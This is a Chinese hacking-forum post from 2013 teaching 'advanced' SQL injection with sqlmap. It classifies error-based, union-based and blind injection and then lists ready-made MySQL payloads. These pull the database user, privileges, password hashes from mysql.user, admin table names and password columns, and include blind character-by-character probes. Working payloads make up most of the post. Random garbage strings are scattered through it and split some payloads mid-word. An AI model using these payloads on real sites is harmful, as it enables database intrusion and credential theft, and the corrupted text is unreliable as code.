找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2724|回复: 0
打印 上一主题 下一主题

sqlmap高级注入

[复制链接]
跳转到指定楼层
楼主
发表于 2013-7-16 20:31:26 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
放假第一天,本应该好好放松一下,可是还是想着把文章写完先。。。
, a0 [$ y" f; {; Y # P5 h$ V1 {! T* t# p. l" g
这次的主题是高级注入,坛子里也讲到了一些,不过本文旨在给大家一个更深刻的概念和全面的理解,下面看看我自己列的一个表
  @  F" L& A+ C' N
9 Z, v6 b# y4 i分类标准        分类        备注
0 r- j7 ~% _( Q6 A4 R6 z2 I按字段类型        整型注入,字符型注入        / j& O. q4 a# r9 I7 i
按出现的位置        get注入,post注入,cookie注入,http header注入          l3 [/ e' n2 X2 \9 Z2 C
然而高级注入是这样的6 @# P3 M9 Y' j$ K; Y( C: ^
5 ^  _3 x: b( @1 ?% C$ N  w/ q7 k& b
高级注入分类        条件5 S5 |0 a6 m2 [% T  J1 d
error-based sql        数据库的错误回显可以返回,存在数据库,表结构
- f9 a% ^9 m+ V( h! b2 ~2 f* cunion-based sql        能够使用union,存在数据库,表结构7 G; W2 @; [$ r; h
blind sql        存在注入
- J) i; B( N+ ^/ K* x" l% E1 o我们暂且不考虑waf等的影响,只从原理上学习。通过上面我们不难发现,三种高级注入选择的顺序应该是eub(第一个字母,后面为了方便我都这样表示了 ),实际上,e是不需要知道字段数的,u需要知道字段数,e之所以在前我觉得主要是因为这个,因为在其他方面它们没有本质的区别,它们都需要知道数据库以及表的结构,这样才能构造出相应的语句,当然,能e一般能u(没过滤union等),反过来却很不一定,因为一般会有自定义的错误提醒。如果没有结构,那么就回到了最悲剧,最麻烦的b了,猜。。。当然可能没有结果,但是如果只是不能使用u,有结构,b还是能出结果的,只是苦逼点而已。。。9 p3 `2 P- [3 Y! L1 x% S" f0 z+ v
& H  C$ e% b7 [
好了,说了这么多,该上神器sqlmap了,最近坛子里貌似很火7 I$ X7 Y8 b1 n0 B. Y

% r! l  T8 @; w, v1 K附件分别以mysql和mssql为例子,提醒:sqlmap中使用-v 3可以查看每个请求的payload。+ d4 }( V" F+ m. m9 O4 B3 e8 p

9 u3 G# d$ t. m这里用mysql说明9 Z/ m# s# _& f

6 W4 }" L* b; H* z1 B# X( ^6 A: S) k6 }e注入坛子里很多了,请看戳我或者再戳我
( U1 Y' h+ Q' q8 M 8 i- s& o0 `3 j, ?' o0 x
u注入其实也很多了,这里就大概帖上一些重要语句吧,附件上结合例子都有的
' K0 s' T7 N) N7 X! Z , q' f" D* r' N7 @  i
获取当前数据库用户名
/ s. d: X& u; |5 V" i: q 2 p# P# o- \. o* i: f. Z
UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(C3 g/ i" n6 h1 Z8 G6 ^
AST(CURRENT_USER() AS CHAR),0x20),0x3a6864623a), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NUL
9 S2 V8 o( Z5 G( a! H- aL, NULL#
+ x5 G7 }# a* H0 M注意concat那里不是必须的,只是sqlmap为了自动攫取出数据加上的特征,下面语句类似,涉及基础性的知识,基友们自己去补吧。+ D7 Z" e, ^1 K5 j9 s3 M

/ H! Y4 @3 \, i0 A0 u  t: ~7 S0 M获取数据库名/ `/ O2 L5 t3 @* n
: s4 j( M7 p" ^& M& h4 n
UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(CAST(DATABASE() AS CHAR),0x20),0x3a6864623a), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL#
6 m4 r, ?1 h; p4 f7 u获取所有用户名
# [) ~* u7 m4 M5 v9 s  ~0 ] $ W( |' C7 m. {9 o+ r9 n
UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(CAST(grantee AS CHAR),0x20),0x3a6864623a), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM INFORMATION_SCHEMA.USER_PRIVILEGES#' W, ~( c6 G+ n- E5 m' `4 j
查看当前用户权限
9 C/ ^3 b9 a$ N7 ~' B; g3 J 2 y# ]) l* @3 U! n9 H( v
UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(CAST(grantee AS CHAR),0x20),0x697461626a6e,IFNULL(CAST(privilege_type AS CHAR),0x20),0x3a6864623a), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM INFORMATION_SCHEMA.USER_PRIVILEGES#- C/ n: O0 E1 G" o( e1 [* [8 e0 t
尝试获取密码,当然需要有能读mysql数据库的权限
3 ^1 l  M9 T6 h+ J - V9 D) r- x' X0 B
UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(CAST(user AS CHAR),0x20),0x697461626a6e,IFNULL(CAST(password AS CHAR),0x20),0x3a6864623a), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM mysql.user#
6 a7 A" h' M4 d1 B- ~获取表名,limit什么的自己搞啦
" B1 H& b) }- T7 G* R( A. W. k
9 x  E( N# I& b5 R( ]UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(CAST(table_name AS CHAR),0x20),0x3a6864623a), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM INFORMATION_SCHEMA.TABLES WHERE table_schema = 0x7061727474696d655f6a6f62#
! d- J7 _" L1 K; \0 @8 g( K, \获取字段名及其类型' X1 f) ^+ s5 q7 D
UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(CAST(column_name AS CHAR),0×20),0x697461626a6e,IFNULL(CAST(column_type AS CHAR),0×20),0x3a6864623a),NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x61646d696e5f7461626c65 AND table_schema=0x7061727474696d655f6a6f62 AND (column_name=0x61646d696e6e616d65 OR column_name=0x70617373776f7264)#
6 A$ a  r+ J$ P; j% n" [# D. T. D ; m& X( W3 w1 O6 R$ v9 N- e7 \4 d
b注入,呵呵,除了当前用户,数据库,版本可以出来,而如果不能u,但存在数据的结构表,还是能苦逼出来,否则猜也不一定能猜到表和字段,内容自然也出不来,苦逼access啊。。。
7 V/ Y! ^5 ?9 H; ^8 C
1 Z) q+ n* |/ ?如:
5 E0 O8 s. M) }  H获取当前用户名4 ^- l# ^/ f$ L, ?& z
/ ^1 A) l1 [2 M8 r4 h5 m1 K5 n/ k& F7 U
AND ORD(MID((IFNULL(CAST(CURRENT_USER() AS CHAR),0x20)),1,1)) > 116( r8 u. m( E8 z" {& p% S7 D! E+ f
获取当前数据库
4 C  D$ x! H4 k: h$ P ! c( R/ K9 R$ Z! A; o
AND ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),6,1)) > 106& |: D* d6 B6 f1 r% l
获取表名% `0 _1 y. t: i1 E3 G. w) Y

* m) @, e9 B5 ^/ oAND ORD(MID((SELECT IFNULL(CAST(COUNT(table_name) AS CHAR),0x20) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x7061727474696d655f6a6f62),1,1)) > 51
% T- N7 B- S8 ]* j获取字段名及其类型和爆内容就不说了,改改上面的就可以了。
* m" D! N$ m- T- j/ f回到最苦逼的情况,无结构的,mysql版本<5.0,现在不多见了吧,还是看看语句。. O; X/ W% H4 F. P/ I0 M
爆表
+ j* K$ `6 d: @9 p 4 R+ A" o5 i; s- f  B
AND EXISTS(select * from table)
/ c6 ^8 |6 k$ U! Q9 x爆字段
# p; t; ^/ P3 q# E- A+ e- B- N ' @/ r2 h+ K! c, c! B8 ~7 f/ w  T# m
AND EXISTS(select pwd from table)
0 Z6 w( S' p9 B% V盲注的变化就比较多了,由于篇幅,只是举个例子而已。7 Q: w% Q' T, ?

0 B) {, Q9 X8 H" |+ c: t本来想把mssql和access都写上的,不过编辑得太累了,有时间再写吧,其实原理都差不多,今天就洗洗睡了吧。
3 X- R9 R* F, H
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表